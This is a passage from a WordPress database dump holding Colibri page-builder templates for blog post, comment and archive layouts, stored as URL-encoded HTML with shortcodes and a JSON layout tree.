<!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22432-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22432-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20colibri-post-thumbnail-has-placeholder%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%20colibri-post-content%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n            <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n                </div>\n                <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',31,'https://gsudice.dataconn.net/?p=33',0,'revision','',0),(34,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n          <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2234-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%2234-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2234-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2234-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>[colibri_layout_wrapper name=\"navigation_container\"]\n      <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n            <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n                  <!---->\n                  <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n            <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n            <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n                  <!---->\n                  <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>[/colibri_layout_wrapper]</div>\n  </div>\n</div>','main_archive','','publish','closed','closed','','34','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_main&#038;p=34',0,'extb_post_main','',0),(35,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"34-m27\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":107,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"34-m28\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":108,\"type\":\"main\"}],\"id\":\"34-m26\",\"parentId\":\"34-m25\",\"partialId\":34,\"styleRef\":106,\"type\":\"main\"}],\"id\":\"34-m25\",\"parentId\":\"34-m2\",\"partialId\":34,\"styleRef\":105,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"slot\":null,\"parentId\":\"34-m4\",\"index\":0,\"id\":\"34-m5\",\"partialId\":34,\"styleRef\":111,\"type\":\"main\",\"props\":{\"showPlaceholder\":false}},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"100\"}}}}},\"id\":\"34-m7\",\"parentId\":\"34-m6\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by 